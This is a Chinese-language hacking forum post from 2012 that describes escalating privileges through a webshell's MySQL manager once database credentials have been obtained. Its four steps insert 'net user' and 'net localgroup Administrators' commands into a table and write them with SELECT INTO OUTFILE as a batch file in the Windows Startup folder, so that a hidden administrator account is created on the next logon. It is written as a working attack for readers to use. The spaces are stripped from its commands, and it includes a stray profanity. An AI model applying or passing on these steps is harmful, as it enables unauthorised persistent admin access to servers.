mysql小小的一种提权思路(备份提权)

[复制链接]
查看306 | 回复0 | 2012-4-1 19:18:02 | 显示全部楼层 |阅读模式
我们这样假设下,当我们找到MYSQL的帐户密码时候!却发现无法导出UDF或者没足够的权限去执行SQL语句.可以尝试此种方法!还有此方法只能导出BAT格式的文件!因为使用此方法之前我碰了不少版.其实是可以用WS组建或者SA组建去执行程序...由于webshell大部分组建被删除!所以米办法..国内有很多相关文章..请大家多多去关注.
打开PHPSHELL->MYSQL管理
第一步:执行createtableleon(cmdtext);//创建个表名为leon



由于大部分组件被删除没必要用wscript.shell去干活!
 
第二步:insertintoleonvalues("cmd.exe/cnetuserpjleonppleon/add");



 


 


 
这一步很简单吧?帐户密码的创建!
 
第三步:insertintoleonvalues("cmd.exe/cnetlocalgroupAdministratorspjleon/add");


加到administrators管理组.最后一部就是用SQL语句导出个批处理格式的文件来.
 
第四步:执行select*fromaintooutfileC:\\DocumentsandSettings\\AllUsers\\「开始」菜单\\程序\\启动\\leon.bat



比较简单的操作..fuckyou


 


写入启动项等等...看自己如何利用咯!
*
*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则